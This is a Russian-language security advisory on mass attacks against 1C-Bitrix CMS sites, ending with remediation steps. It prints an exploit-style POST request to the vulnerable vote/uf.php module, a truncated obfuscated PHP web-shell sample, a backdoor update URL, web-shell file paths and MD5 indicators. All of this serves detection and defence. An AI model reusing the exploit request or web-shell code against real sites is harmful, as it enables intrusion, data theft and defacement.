1. Описание зафиксированной угрозы 

[Название угрозы]: Множественные атаки на CMS Bitrix RU-сегмента сети Интернет

[Тип угрозы]: утечки данных, кибератаки

[Platform]: CMS Bitrix

[Product]: 1С-Битрикс: Управление сайтом

[Version]: до 22.0.400

[Severity]: High

[Дата обнаружения]: 06/2023

С начала июня 2023 года был зафиксирован ряд инцидентов ИБ, связанных с кибератаками на российский сегмент сети Интернет, в частности, в отношении сайтов, использующих CMS Bitrix.

2. Технические детали угрозы

2.1 Сведения об уязвимостях

Злоумышленники активно эксплуатируют уязвимости платформы CMS Bitrix (уязвимы версии до 22.0.400):

Arbitrary Object Instantiation (CVE-2022-27228)

Описание из Банка данных угроз:

Использование уязвимости модуля «vote» системы управления содержимым сайтов (CMS) «1С-Битрикс: Управление сайтом» позволяет отправлять специально сформированные сетевые пакеты: нарушитель может удаленно записать произвольные файлы в уязвимую систему.

Уязвимый модуль: vote/uf.php

Arbitrary File Write

Тип уязвимости, которая позволяет злоумышленнику загружать вредоносные файлы на сервер. Модуль «html_editor_action.php» является частью визуального HTML-редактора, в котором происходит работа с изображениями, ссылками, файлами и т. д.

Уязвимый модуль: html_editor_action.php

Server-Side Request Forgery

Подделка запроса на стороне сервера — это атака, которая позволяет отправлять запросы от имени сервера к внешним или внутренним ресурсам. При этом злоумышленник может контролировать либо весь запрос целиком, либо его отдельные части.

Уязвимый модуль: html_editor_action.php

2.2 Сведения об атаках

Эксплуатация описанных уязвимостей приводит к исполнению произвольного кода PHP, вследствие чего возможно построение дальнейшего вектора атаки на сервер, включая исполнение кода командной оболочкой ОС. Злоумышленники загружают на сайт вредоносное программное обеспечение типа веб-шелл: эта командная оболочка используется для управления сервером с помощью команд. Благодаря ей злоумышленники достигают разных целей: выгрузка данных с атакованного ресурса, дефейс сайта, повреждение данных и др.

По результатам расследований, проведенных специалистами Jet CSIRT, было выявлено, что злоумышленники получили доступ к уязвимым системам за 3-6 месяцев до публикации полученных данных в Telegram-каналах и DarkNet форумах.

2.3 Сведения об используемом ВПО и индикаторах компрометации

Попытки эксплуатации уязвимостей можно обнаружить в журналах веб-сервера, так как уязвимость заключается в некорректной обработке пользовательских данных в POST-запросах.

Примеры запросов, на которые необходимо обратить внимание:

POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0
POST /bitrix/tools/html_editor_action.php HTTP/1.0

Следует также обратить внимание на файлы со сгенерированным (не словарным) наименованием.

Пример запросов обращения злоумышленников к веб-шелл, обнаруженных в логах:

GET /81920ba2a5fe.php HTTP/1.0

Примеры обнаруженных вредоносных файлов в ходе расследований:

bitrix\13005.php

bitrix\1894.php

bitrix\docs\43fc2\d354e.php

bitrix\docs\43fc2\77e1c.php

bitrix\docs\assets\images\49a8d85d95.php

bitrix\docs\assets\images\09be0e1d77.php

bitrix\docs\0bfe9.php

bitrix\docs\6b4c8.php

bitrix\docs\official\312a9\305ef.php

bitrix\docs\official\312a9\65c0e.php

bitrix\docs\official\assets\images\c8a98f058f.php

bitrix\docs\official\assets\images\d274aa06fb.php

bitrix\docs\official\2fcd0.php

bitrix\docs\official\f9beb.php

bitrix\docs\official\assets\images\zbhry4.php

bitrix\docs\81920ba2a5fe.php

bitrix\docs\90173780d1ff.php


Кроме того, в некоторых случаях веб-шелл могут маскировать под легитимные модули и скрипты. Например, в ходе расследований Jet CSIRT установлены следующие имена файлов, которые использовались злоумышленниками:

\bitrix\tools\ajax_cache.php

\bitrix\tools\seo_cache.php

\docs\bitrix\tools\cache.php

\docs\bitrix\tools\spread.php


Значительная часть выявленного вредоносного программного обеспечения представляет собой веб-шелл со следующими функциями:

  • сбор информации о сервере (версия ОС, информация о пользователях, установленное ПО и модули);
  • функции файлового менеджера для просмотра директорий сервера, загрузки и выгрузки файлов;
  • функции по работе с базами данных.

Некоторые образцы вредоносного программного обеспечения используют методы обфускации для усложнения детектирования при сканировании антивирусными средствами.

Например, образец 13005.php, обнаруженный в одном из расследований, содержит следующие данные:

<?=/*!*/@/**8**/null; echo@null;goto O4809;O6131:$O8797='o';goto O5881;O7094:$O5319='n';goto O4845;O8585:$O1333='f';goto O9593;O5239:$O3361=$O5305.$O9000.$O4994.$O5319.$O1333.$O8539.$O8018.$O3314.$O4387;goto O2817;O3463:$O9000='z';goto O9339;O5881:$O9366='v';goto O6846;O2817:$O7244=$O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.$O8797.$O2275.$O4387;goto O8251;O0032:$O4994='i';goto O3463;O3774:$O9705='_';goto O7261;O6231:$O9467='b';goto O2749;O4157:$O8539='l';goto O7032;O2749:$O8018='a';goto O3774;O9593:$O4387='e';goto O3270;O7378:$O1860='6';goto O6131;O7261:$O6447=$O7407.$O3314.$O5781.$O5781.$O4387.$O9366;goto O5239;O9490:$O3314='t';goto O6231;O6846:$O9137='4';goto O7094;O3270:$O2275='d';goto O9490;O4809:$O5305='g';goto O0032;O4845:$O7407='s';goto O4157;O9339:$O0763='c';goto O7378;O7032:$O5781='r';goto O8585;O8251:eval($O3361($O6447($O7244('B/9/7/vv+f8/0IZz8hR+qZBNt/PMclswFbY5R1EXiEwKMS9wqucGe9191KNlEh75kfqFH7tUjvb5Z22...

Для деобфускации потребуется несколько раундов функций gzinflate, strrev, base64_decode, htmlspecialchars_decode, str_rot13. После декодирования данного образца установлено, что данный веб-шелл является экземпляром FierzaXploit Shell v1.3. Помимо стандартных функций, для данного типа ВПО выявлены следующие отличительные особенности:

  • В качестве защиты ВПО всегда возвращает ошибку 404, также имеет защиту от индексации по User-Agent
    http_response_code(404)
  • ВПО обладает встроенной системой обновлений, а также проверяет наличие файла
    https://github.com/FierzaEriez/FierzaEriez.github.io/blob/main/FX-Backdoor(1.4).php
  • В ВПО встроен функционал массового дефейса, удаления файлов, сканирования портов и т. д.
  • Часть кода ВПО представлена на индонезийском (малайском) языке
  • Отдельный модуль ВПО отслеживает заряд батареи ноутбука пользователя
  • ВПО использует в своем составе библиотеку sweetalert2, которая при подключении на сайтах в доменах .ru|.su|.by|.рф включает гимн Украины и блокирует взаимодействие с элементами на странице

IOC [md5]:

05D80C987737E509BA8E6C086DF95F7D

444CE1927E336A2CB03D77524A94005B

478FB84B111583F5997DBC51DDFC948F

5A68BB6C9968847F6D5607E3C4078EA5

8814B198F941A0E98C573682ED06C13A

E090C52F424AC685F8AEF8186A7A8A13

C6D91C19BF317345AF855DA38BC3A16F

DB1FFA3D01E000DB2951F9EDBCB75910

0C42BD47F4842C64206CD3CF8BFC7C8F

4CC97EB66483302F9D0D0ED88E2DA1B0

7495CDCA064EEBA1B61F8270C653BE37

8C0195C0CDA99AA19756A8C0F560752C

EB892F04DBD3E672DB91C5EDCD56F9BF


3. Рекомендации по устранению

1. Произвести обновление CMS до актуальной стабильной версии (как минимум как до версии 22.0.400).

2. Произвести обновление PHP до актуальной стабильной версии.

3. Провести проверку файловой системы сервера CMS на предмет наличия подозрительных файлов: для проверки использовать антивирусное решение в режиме максимальной эвристики. При обнаружении подозрительных файлов их нужно проанализировать и при отсутствии необходимости данных файлов для обеспечения функционирования CMS или веб-приложения — удалить. Для проведения подробного исследования необходимо сохранить копию подозрительных файлов.

4. Рекомендуется выполнить проверку веб-приложения посредством специализированного сканера уязвимостей, доступного по ссылке https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/.

5. Необходимо рассмотреть возможности по закрытию доступа к следующим файлам на уровне сервера (например, в .htaccess):

  • /bitrix/tools/upload.php
  • /bitrix/tools/mail_entry.php
  • /bitrix/modules/main/include/virtual_file_system.php
  • /bitrix/components/bitrix/sender.mail.editor/ajax.php
  • /bitrix/tools/vote/uf.php
  • /bitrix/tools/html_editor_action.php
  • /bitrix/admin/site_checker.php

6. Следует проверить уровень журналирования событий веб-сервера и баз данных, оценить содержимое журналов событий на наличие подозрительных событий, таких как доступ к уязвимым модулям, неизвестным файлам.

7. Рассмотреть возможность применения решений класса Web Application Firewall (WAF) для защиты веб-приложений.

4. Ссылки